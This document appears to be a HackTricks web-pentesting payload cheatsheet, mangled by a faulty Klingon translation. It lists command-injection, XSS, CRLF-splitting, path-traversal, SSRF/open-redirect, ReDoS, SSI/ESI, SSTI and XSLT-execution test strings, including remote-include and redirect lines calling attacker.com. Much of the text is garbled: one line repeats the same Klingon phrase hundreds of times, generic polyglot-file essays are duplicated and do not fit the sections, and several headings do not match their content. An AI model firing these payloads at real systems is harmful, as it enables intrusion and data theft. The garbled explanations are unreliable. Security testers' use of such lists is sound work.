hacktricks/pentesting-web/pocs-and-polygloths-cheatsheet

qo'wI'wI' - PoCs je Polygloths CheatSheet

htARTE (HackTricks AWS Red Team Expert) laH HackTricks AWS hacking!

HackTricks ni'wI'wI' vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh qawHaqtricks:

• tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh tlhIngan Hol vItlhutlhlaHbe'chugh **

{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

Client Side Template Injection

tlhIngan Hol

QaStaHvIS

Basic Tests

{{7*7}}
[7*7]

Polygloths

Polygloths

Polygloths are files that can be interpreted as multiple file types depending on the context in which they are executed. They are often used in hacking to bypass security measures and execute malicious code. Polygloths can be created by manipulating the file's structure or by embedding different file types within each other.

Polyglot File Structure

A polyglot file is designed to have a valid structure for multiple file types. This allows the file to be interpreted correctly by different programs, depending on the file type being detected. By exploiting the differences in how different programs interpret file headers and structures, a polyglot file can be used to execute code in unexpected ways.

Polyglot File Examples

Here are some examples of polyglot files:

• Image and JavaScript: A file that appears to be a valid image file, but also contains JavaScript code that can be executed when the file is opened in a web browser.

• PDF and ZIP: A file that appears to be a valid PDF document, but also contains a ZIP archive that can be extracted when the file is opened with a ZIP utility.

• HTML and PHP: A file that appears to be a valid HTML document, but also contains PHP code that can be executed when the file is processed by a web server.

Using Polygloths in Hacking

Polygloths can be used in various hacking scenarios, including:

• Bypassing File Type Filters: By creating a polyglot file that appears to be a harmless file type, such as an image or a document, hackers can bypass file type filters and upload malicious code to a target system.

• Evading Antivirus Detection: By embedding malicious code within a polyglot file, hackers can evade antivirus detection systems that rely on file signatures or heuristics to identify malicious files.

• Exploiting File Processing Vulnerabilities: Polygloths can be used to exploit vulnerabilities in file processing systems. By tricking a program into interpreting a polyglot file as a different file type, hackers can execute code that takes advantage of vulnerabilities specific to that file type.

Conclusion

Polygloths are powerful tools in the hacker's arsenal. By leveraging the ability to be interpreted as multiple file types, polygloths can be used to bypass security measures, evade detection, and exploit vulnerabilities. It is important for security professionals to be aware of polyglot files and understand how they can be used in hacking attacks.

{{7*7}}[7*7]

Command Injection

Basic Tests

tlhIngan Hol translation:

Command Injection

Basic Tests

;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)

Polygloths

Polygloths

Polygloths are files that can be interpreted as multiple file types depending on the context in which they are executed. They are often used in hacking to bypass security measures and execute malicious code. Polygloths can be created by manipulating the file's structure or by embedding different file types within each other.

Polyglot File Structure

A polyglot file is designed to have a valid structure for multiple file types. This allows the file to be interpreted correctly by different programs, depending on the file type being detected. By exploiting the differences in how different programs interpret file headers and structures, a polyglot file can be used to execute code in unexpected ways.

Polyglot File Examples

Here are some examples of polyglot files:

• Image and Script: A file that can be interpreted as both an image file and a script file. This can be achieved by embedding a script within the image file's metadata or by manipulating the file's structure to make it appear as both an image and a script.

• PDF and HTML: A file that can be interpreted as both a PDF file and an HTML file. This can be achieved by embedding HTML code within a PDF file or by manipulating the file's structure to make it appear as both a PDF and an HTML file.

• Audio and Document: A file that can be interpreted as both an audio file and a document file. This can be achieved by embedding audio data within a document file or by manipulating the file's structure to make it appear as both an audio and a document file.

Uses of Polygloths in Hacking

Polygloths can be used in various hacking scenarios, including:

• Bypassing Security Measures: By disguising malicious code as a harmless file type, polygloths can bypass security measures that only scan for specific file types. For example, a polyglot file that appears as an image file may not be scanned for malicious code by an antivirus program that only scans for executable files.

• Exploiting Vulnerabilities: Polygloths can be used to exploit vulnerabilities in software that interprets multiple file types. By manipulating the file's structure, an attacker can trigger a vulnerability in a program and execute malicious code.

• Data Exfiltration: Polygloths can be used to exfiltrate sensitive data by embedding it within a file that appears harmless. For example, an attacker may embed sensitive data within an image file and then send it through a communication channel without arousing suspicion.

Detecting Polygloths

Detecting polygloths can be challenging, as they are designed to appear as legitimate files of multiple types. However, there are some techniques that can be used to identify polyglot files:

• File Signature Analysis: Analyzing the file's signature can help identify if it is a polyglot file. The signature may reveal inconsistencies or multiple file type indicators.

• File Structure Analysis: Analyzing the file's structure can help identify if it is a polyglot file. Inconsistencies or unexpected elements in the file's structure may indicate that it is a polyglot.

• Behavioral Analysis: Executing the file in a controlled environment and monitoring its behavior can help identify if it is a polyglot file. Unexpected behavior or execution of code from multiple file types can indicate that it is a polyglot.

Conclusion

Polygloths are powerful tools in the hands of hackers, allowing them to bypass security measures and execute malicious code. As a defender, it is important to be aware of the existence of polygloths and to implement appropriate security measures to detect and mitigate their risks.

1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

CRLF

Qa'Hom QaD

Test 1: CRLF Injection

Description:

This test checks for CRLF injection vulnerabilities in web applications. CRLF injection occurs when an attacker is able to inject CRLF characters (%0D%0A or \r\n) into an HTTP response header or body. This can lead to various security issues such as HTTP response splitting, cache poisoning, and cross-site scripting (XSS) attacks.

Steps:

1. Send a request to the target web application with a payload that includes CRLF characters (%0D%0A or \r\n) in the request parameters or headers.
2. Check the response for any unexpected behavior or anomalies, such as the presence of additional headers or unexpected line breaks.

Example:

GET /vulnerable.php?param1=test%0D%0AInjectedHeader:malicious%0D%0A%0D%0AHTTP/1.1
Host: example.com

Remediation:

To prevent CRLF injection vulnerabilities, ensure that all user-supplied input is properly validated and sanitized before being used in HTTP responses. Additionally, consider using a web application firewall (WAF) to detect and block CRLF injection attempts.

Test 2: HTTP Response Splitting

Description:

This test checks for HTTP response splitting vulnerabilities in web applications. HTTP response splitting occurs when an attacker is able to inject CRLF characters (%0D%0A or \r\n) into an HTTP response header. This can lead to security issues such as cache poisoning, session hijacking, and cross-site scripting (XSS) attacks.

Steps:

1. Send a request to the target web application with a payload that includes CRLF characters (%0D%0A or \r\n) in the request parameters or headers.
2. Check the response for any unexpected behavior or anomalies, such as the presence of additional headers or unexpected line breaks.

Example:

GET /vulnerable.php?param1=test%0D%0AInjectedHeader:malicious%0D%0A%0D%0AHTTP/1.1
Host: example.com

Remediation:

To prevent HTTP response splitting vulnerabilities, ensure that all user-supplied input is properly validated and sanitized before being used in HTTP responses. Additionally, consider using a web application firewall (WAF) to detect and block HTTP response splitting attempts.

%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E

Dangling Markup

Basic Tests

Qa'Hom QaD

Test 1: HTML Injection

Description

HTML injection is a vulnerability that allows an attacker to inject malicious HTML code into a web page. This can lead to various attacks such as cross-site scripting (XSS) or defacement of the website.

Test

To test for HTML injection, you can try injecting simple HTML tags into user input fields or query parameters. For example, you can try injecting the following code:

<script>alert('XSS')</script>

If the injected code is executed and an alert box with the message "XSS" is displayed, it indicates a vulnerability.

Remediation

To prevent HTML injection, you should always sanitize user input and encode special characters. Use proper input validation and output encoding techniques to ensure that user-supplied data is treated as plain text and not interpreted as HTML code.

Test 2: SQL Injection

Description

SQL injection is a vulnerability that allows an attacker to manipulate SQL queries executed by a web application. This can lead to unauthorized access, data leakage, or even complete compromise of the underlying database.

Test

To test for SQL injection, you can try injecting SQL statements into user input fields or query parameters. For example, you can try injecting the following code:

' OR '1'='1' --

If the injected code alters the behavior of the SQL query and returns unexpected results, it indicates a vulnerability.

Remediation

To prevent SQL injection, you should always use parameterized queries or prepared statements. These techniques ensure that user input is treated as data and not as part of the SQL query itself. Additionally, input validation and proper error handling should be implemented to detect and prevent SQL injection attacks.

Test 3: Command Injection

Description

Command injection is a vulnerability that allows an attacker to execute arbitrary commands on the underlying operating system. This can lead to unauthorized access, data manipulation, or even complete compromise of the system.

Test

To test for command injection, you can try injecting arbitrary commands into user input fields or query parameters. For example, you can try injecting the following code:

; ls -la

If the injected code is executed and the output of the ls -la command is displayed, it indicates a vulnerability.

Remediation

To prevent command injection, you should never directly execute user-supplied input as a command. Instead, use proper input validation and sanitization techniques to ensure that user input is treated as data and not as executable code. Additionally, access controls should be implemented to limit the privileges of the web application and prevent unauthorized command execution.

<br><b><h1>THIS IS AND INJECTED TITLE </h1>

ghItlhvam/Path Traversal

pagh QaD

Directory Traversal

Description

A directory traversal attack (also known as path traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with "dot-dot-slash (../)" sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and critical system files.

Example

GET /vulnerable.php?page=../../../../etc/passwd HTTP/1.1
Host: example.com

Prevention

• Avoid passing user-supplied input directly to file paths or include statements.
• Implement a whitelist of allowed file names or directories.
• Use platform-specific functions to sanitize file paths.
• Set appropriate file system permissions to restrict access to sensitive files and directories.

Local File Inclusion (LFI)

Description

Local File Inclusion (LFI) is a type of vulnerability that allows an attacker to include files on a server through the web browser. This vulnerability occurs when a web application does not properly sanitize user-supplied input, allowing an attacker to manipulate the input and include arbitrary files from the local file system.

Example

GET /vulnerable.php?page=/etc/passwd HTTP/1.1
Host: example.com

Prevention

• Avoid passing user-supplied input directly to file paths or include statements.
• Implement a whitelist of allowed file names or directories.
• Use platform-specific functions to sanitize file paths.
• Set appropriate file system permissions to restrict access to sensitive files and directories.

Remote File Inclusion (RFI)

Description

Remote File Inclusion (RFI) is a type of vulnerability that allows an attacker to include files from a remote server through the web browser. This vulnerability occurs when a web application does not properly sanitize user-supplied input, allowing an attacker to manipulate the input and include arbitrary files from a remote server.

Example

GET /vulnerable.php?url=http://attacker.com/malicious.php HTTP/1.1
Host: example.com

Prevention

• Avoid passing user-supplied input directly to file paths or include statements.
• Implement a whitelist of allowed file names or directories.
• Use platform-specific functions to sanitize file paths.
• Set appropriate file system permissions to restrict access to sensitive files and directories.

/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php

Qapla' QaD / Server Side Request Forgery

QaDmey QaDmeyHa'

www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)

ReDoS

QaStaHvIS

Basic Tests

(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$

Server Side Inclusion/Edge Side Inclusion

Qa'Hom QaD

Basic Tests

<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Polygloths

Polygloths

Polygloths are files that can be interpreted as multiple file types depending on the context in which they are executed. They are often used in hacking to bypass security measures and execute malicious code. Polygloths can be created by manipulating the file's structure or by embedding different file types within each other.

Polyglot File Structure

A polyglot file is designed to have a valid structure for multiple file types. This allows the file to be interpreted correctly by different programs, depending on the file type being detected. By exploiting the differences in how different programs interpret file headers and structures, a polyglot file can be used to execute code in unexpected ways.

Polyglot File Examples

Here are some examples of polyglot files:

• Image and JavaScript: A file that appears to be a valid image file, but also contains JavaScript code that can be executed when the file is opened in a web browser.

• PDF and ZIP: A file that appears to be a valid PDF document, but also contains a ZIP archive that can be extracted when the file is opened with a ZIP utility.

• HTML and PHP: A file that appears to be a valid HTML document, but also contains PHP code that can be executed when the file is processed by a web server.

Polyglot File Detection

Detecting polyglot files can be challenging because they can appear as valid files of different types. However, there are some techniques that can be used to identify polyglot files:

• File Signature Analysis: Analyzing the file signature can reveal inconsistencies that indicate the presence of multiple file types within the same file.

• File Structure Analysis: Examining the file structure can help identify anomalies that suggest the file is a polyglot.

• Content Analysis: Analyzing the content of the file can reveal unexpected behavior or code that indicates the presence of multiple file types.

Polyglot File Exploitation

Polyglot files can be used in various hacking scenarios, including:

• Malware Delivery: Polyglot files can be used to deliver malware by exploiting vulnerabilities in file parsers or by tricking users into executing the file.

• Data Exfiltration: Polyglot files can be used to exfiltrate data by embedding sensitive information within a file that appears harmless.

• Bypassing Security Measures: Polyglot files can be used to bypass security measures that rely on file type detection, allowing malicious code to be executed without detection.

Conclusion

Polyglot files are a powerful tool in the hacker's arsenal. By exploiting the ability of files to be interpreted as multiple types, hackers can bypass security measures and execute malicious code. Detecting and defending against polyglot files requires a thorough understanding of file signatures, structures, and content analysis techniques.

<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Server Side Request Forgery

The same tests used for Open Redirect can be used here.

Server Side Template Injection

Basic Tests

${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Polygloths

Polygloths

Polygloths are files that can be interpreted as multiple file types depending on the context in which they are executed. They are often used in hacking to bypass security measures and gain unauthorized access to systems.

Polygloths can be created by manipulating the file's structure and content to make it appear as different file types. This can be achieved by adding specific headers, changing file extensions, or embedding different file formats within the same file.

By using polygloths, hackers can trick security systems into treating the file as harmless, while it actually contains malicious code or exploits. This allows them to bypass security checks and execute their attacks without detection.

Polygloths can be used in various hacking scenarios, such as phishing attacks, malware distribution, or remote code execution. They can be delivered through different channels, including email attachments, malicious websites, or compromised software.

To protect against polygloths, it is important to have robust security measures in place. This includes using up-to-date antivirus software, implementing strong access controls, and educating users about the risks of opening unknown files.

By understanding the concept of polygloths and how they can be used in hacking, security professionals can better defend against these types of attacks and mitigate the risks they pose to systems and data.

Polygloths

Polygloths are files that can be interpreted as multiple file types depending on the context in which they are executed. They are often used in hacking to bypass security measures and gain unauthorized access to systems.

Polygloths can be created by manipulating the file's structure and content to make it appear as different file types. This can be achieved by adding specific headers, changing file extensions, or embedding different file formats within the same file.

By using polygloths, hackers can trick security systems into treating the file as harmless, while it actually contains malicious code or exploits. This allows them to bypass security checks and execute their attacks without detection.

Polygloths can be used in various hacking scenarios, such as phishing attacks, malware distribution, or remote code execution. They can be delivered through different channels, including email attachments, malicious websites, or compromised software.

To protect against polygloths, it is important to have robust security measures in place. This includes using up-to-date antivirus software, implementing strong access controls, and educating users about the risks of opening unknown files.

By understanding the concept of polygloths and how they can be used in hacking, security professionals can better defend against these types of attacks and mitigate the risks they pose to systems and data.

{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\

XSLT Server Side Injection

Qa'Hom Tests

Test 1: XSLT Server Side Injection

Description

This test checks for XSLT Server Side Injection vulnerabilities by injecting malicious code into an XSLT stylesheet.

Steps

1. Identify the target application that uses XSLT transformations.
2. Locate the input parameter or field that is used in the XSLT transformation.
3. Craft a payload that includes the malicious XSLT code.
4. Inject the payload into the input parameter or field.
5. Observe the response from the server.
6. If the response contains the output of the injected XSLT code, the application is vulnerable to XSLT Server Side Injection.

Example Payload

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace">
  <xsl:output method="html" version="1.0" encoding="UTF-8" indent="yes"/>
  <xsl:template match="/">
    <xsl:variable name="cmd">
      <xsl:value-of select="user:executeCommand('whoami')"/>
    </xsl:variable>
    <html>
      <body>
        <h1>XSLT Server Side Injection</h1>
        <p>Output: <xsl:value-of select="$cmd"/></p>
      </body>
    </html>
  </xsl:template>
</xsl:stylesheet>

Mitigation

To mitigate XSLT Server Side Injection vulnerabilities, follow these best practices:

• Validate and sanitize user input before using it in XSLT transformations.
• Use parameterized queries or prepared statements to prevent code injection.
• Limit the privileges of the user account used by the XSLT transformation engine.
• Regularly update and patch the XSLT transformation engine to fix any known vulnerabilities.

Test 2: XSLT Server Side Injection (Blind)

Description

This test checks for blind XSLT Server Side Injection vulnerabilities by injecting malicious code into an XSLT stylesheet and observing the response from the server.

Steps

1. Identify the target application that uses XSLT transformations.
2. Locate the input parameter or field that is used in the XSLT transformation.
3. Craft a payload that includes the malicious XSLT code.
4. Inject the payload into the input parameter or field.
5. Observe the response from the server.
6. If the response changes in a way that indicates the injected XSLT code was executed, the application is vulnerable to blind XSLT Server Side Injection.

Example Payload

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace">
  <xsl:output method="html" version="1.0" encoding="UTF-8" indent="yes"/>
  <xsl:template match="/">
    <xsl:variable name="cmd">
      <xsl:value-of select="user:executeCommand('whoami')"/>
    </xsl:variable>
    <html>
      <body>
        <h1>XSLT Server Side Injection (Blind)</h1>
        <p>Output: <xsl:value-of select="$cmd"/></p>
      </body>
    </html>
  </xsl:template>
</xsl:stylesheet>

Mitigation

To mitigate blind XSLT Server Side Injection vulnerabilities, follow the same best practices as for regular XSLT Server Side Injection. Additionally, consider implementing the following measures:

• Monitor and analyze server logs for any suspicious behavior.
• Implement Web Application Firewalls (WAFs) to detect and block malicious XSLT code.
• Regularly perform security assessments and penetration tests to identify and fix vulnerabilities.

<xsl:value-of select="system-property('xsl:version')" />
